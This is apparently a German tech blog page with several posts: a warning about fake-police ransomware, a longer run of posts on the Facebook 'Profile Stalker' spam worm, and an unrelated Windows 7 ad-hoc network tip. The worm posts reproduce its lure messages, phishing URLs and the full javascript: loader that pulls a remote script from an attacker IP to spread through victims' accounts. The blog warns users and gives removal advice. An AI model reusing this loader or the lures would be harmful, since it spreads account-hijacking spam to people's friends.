Polizei Virus fordert zum Zahlen auf!

Die Bayerische Polizei warnt vor betrügerischen Virus, der erneut Computernutzer in die Irre führt und durch Überweisungenaufforderungen den PC-Nutzer finanzellen Schaden verursachen kann. Das BKA meldet, dass bereits in fünf Fälle eines aggressiven Computervirus, der unter Verwendung von Logos des Bundeskriminalamtes und der Bundespolizei dazu auffordert eine „Strafe“ in Höhe von 100 Euro zu bezahlen.

Facebook Profile Stalker entfernen / stoppen

Die Facebook-Profile-Stalker-Spam-Offensive läuft nun schon seit über einer Woche. Viele Facebook Nutzer haben es bereits erkannt, dass es sich um eine Phishing-Masche handelt.

Leider ist das ganze so flexibel, dass es wohl noch eine Zeit dauern wird bis Facebook das ganze den Riegel vorschieben kann. Mir wurde heute wieder eine neue URL angeboten die den Profile Stalker ausführt.

Neue URL im Profilestalker Style der sich selbst auf Facebook verbreitet.

Ebenfalls neu ist die aktuelle Textnachricht die den Facebooknutzern angeboten wird. Derzeit wird das böse Script mit

Folge diesen einfachen Schritten um zu sehen wer dein Profil

beworben.

Wie auch mittlerweile bei einigen Besuchern bekannt, wurde auch finanzeller Schaden angerichtet:

Als nächstes muss man (angeblich zur Bestätigung bzw. Verifizierung oder „Nachweisprüfung“ von irgendwas) an einem Intelligenztest teilnehmen. Das sieht aus wie ein normales Facebook-Spiel. Das Ergebnis bekommt man aber nicht zu sehen, sondern muss es sich auf sein Handy senden lassen (Alarmglocke Nr. drei, vier und fünf). Damit wissen die Erfinder der Sache nun jede Menge gültige Handy-Nummern und PINs, die bei der Gelegenheit mit eingegeben werden müssen. Gleichzeitig geht man einen Vertrag ein, bei dem einem alle paar Tage 2,99 € vom Prepaid-Konto/Handyvertrag abgebucht werden.* Hat man ja mit seiner PIN eben bestätigt. Durch das ungewollte Verschicken von Einladungen zu dem Ereignis sorgt man dafür, dass wenigstens ein paar der eigenen Freunde auch auf die Sache hereinfallen. Das wird immer so weitergehen, bis Facebook die Ausführung des Scripts blockt.
_________________

* Mit Eingabe der Handy- und PIN-Nummer schließen Sie einen Blinkogold Abonnement-Vertrag ab. Auf diese Weise erhalten Sie alle fünf Tage die Möglichkeit, im Blinkogold Games Abonnement ein Spiel oder anderen Inhalte auf Ihr Handy downzuloaden oder im Blinkogold Entertainment Abonnement fünf mobile Inhalte auf Ihr Handy downzuloaden. Dafür fallen 2,99 EUR für jede Abo-Periode (fünf Tage) an; Download-Gebühren der jeweiligen Netzbetreiber nicht inbegriffen. Der Betrag wird über Ihre monatliche Handyrechnung in Rechnung gestellt bzw. bei Prepaid-Handys dem Handy belastet.

 Was könnt ihr tun um den Facebook Profile Stalker zu enternen/stoppen?

1. Meldet Post's, Bildmarkierungen, Event und Pinnwandeinträge als Spam an Facebook
2. Lösche die bekannten Spam-Post's, Bildmarkierungen, Event und Pinnwandeinträge von deinen Facebookseiten
3. Verwendet beim Surfen auf Facebook das so genannte WOT (Web of Trust) Plugin. Das Plugin zeigt euch an wie vertrauensvoll der Link ist, der euch angezeigt wird. http://www.mywot.com/en/download
4. Erzählt weiter, dass der Profilstalker eine automatische Spam-/Abzockmaschine ist!

Facebook Profil-Stalker | So laufen die User in die Spamfalle mit live Statistik!!

Nachdem ich gestern über den automatisierten Spam auf Facbook schon berichtet hab, konnte ich heut noch ein paar Abwandlungen vom Profil-Stalker-Finder auf Facebook gestoßen. Von diesem Spamscript gibt es ein paar Codes, die jedoch ähnlich funktionieren.

unter http://216.24.202.125/german2.php die bekannte Message bei Facebook im Quellcode

var chatmessage = "%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ http://viewinddd7yki.blogspot.com/";
var postmessage = "Meine Top Profil-Stalker: \n\ %tf% - 1136 Besuche \n\ %tf% - 983 Besuche \n\ %tf% - 542 Besuche \n\ %tf% - 300 Besuche \n\ Schau dir an wer dein Profil sieht @ http://viewinddd7yki.blogspot.com/";
var redirect = "http://who-myspyyy2.blogspot.com/";
var eventdesc = "";
var eventname = "";
var nfriends = 20;

Durch ein paar Tricks kann man schon einmal herausfinden, wo das ganze gehostet wird. Da wir aber nicht wissen, wie der Hoster in die Spamattake eingebunden ist wollen wir hier keine Urteil fällen.

Durch ein bischen lesen im diesem Javascript das sich auf Facebook via Schneeballeffekt weiter verbreitet, konnte ich eine Interessante Enteckung machen. Unter http://german-spy.blogspot.com/ haben die Spam-Entwickler eine Internetseite eingerichtet auf die die Besucher über den Link in den Chatnachrichten und Profileinträgen geleitet werden. Hier auch wieder die Aufforderung das Script erneut über in die Adresszeile des Browser einzugeben und es daraufhin mit seinem eignen Facebook-Profil auszuführen.

Die Seite mit dem Script und die Aktuelle Besucherzahl, die beim Anklicken mehr Details verrät

Auf der Seite kann man einmal sehen welchen Wahnsinns Effekt das ganze bei Facebook auslöst und wieviele Nutzer darauf tatsächlich reinfallen.

Das Script wurde erstmals am 17ten gestartet!

Besucher auf der Seite die das Script weiterverteilt (Mi-Do)

Facebook | XSS-Angriff?!? | Auf alle Fälle SPAM!

Seit kurzem erhalte ich von unterschiedlichen Freunden die bei Facebook gerade offline sind immer die gleichen Nachrichten.

VORNAME wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @http://ow.ly/4DDVJ

Natürlich kommt man dann auf ihrgend eine komische Seite bei der man wieder irgendwas angeben muss! Achtung ihr macht das alle mit eurem Facebook-Login. Und der Seitenbetreiber bekommt jede Menge Daten über euch die ihr ihm sicherlich nicht mitteilen wollt!

Interessant ist auch wenn man sich die Seite hinter dem Link einmal nüchtern ansieht. Hier wird man aufgeforder sich bei Facebook anzumelden und dann ein Script in den Adressbereich des Browsers einzugeben...
Ja, schon ab hier kann man von XSS(Cross site scripting) sprechen. Es wird gezielt versucht Facebook zwischen verschieden Seitenaufrufen zu manipulieren. Hinter dem Code steckt nach meinen ersten Erkenntnissen nicht mehr, als dass bei einem Aufruf über die Chatfunktion von Facebook per zufall(Math.random()) immer mehr Leute(Freunde) dieser Link geschickt wird!!

Ein massives Spamscript also!

javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://216.24.202.125/invite.php?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

Was genau passiert kann man hier unter http://216.24.202.125/invite.php sehen.

mehr zum Thema:

- Auf T-Online "Facebook-Spam überrollt soziales Netzwerk

Ad-hoc Netzwerk einrichten Windows 7

Bei Windows 7 kann man bei allen Versionen (Windows 7 Starter, Windows 7 home, Windows 7 professional) ein sogenanntes Ad-Hoc Wlan-Netzwerk einrichten. Ein Ad-hoc-Netzwerk ist eine kurzzeitige  Verbindung zwischen anderen Computern und Geräten, das für einen bestimmten Zweck verwendet wird, z. B. zum gemeinsamen zugreifen auf Dokumenten während einer Besprechung oder das Spielen von Mehrspieler-Computerspielen. Mit einem Ad-hoc-Netzwerk kann auch die gemeinsame Nutzung einer Internetverbindung mit anderen Geräten ermöglicht werden. Dadurch muss von diesen Personen nicht extra eine eigene Internetverbindung eingerichtet werden. Ad-hoc-Netzwerke können nur Drahtlosnetzwerke sein. Auf Ihrem Computer muss daher ein Drahtlosnetzwerkadapter installiert sein, damit Sie ein Ad-hoc-Netzwerk einrichten oder ihm beitreten können.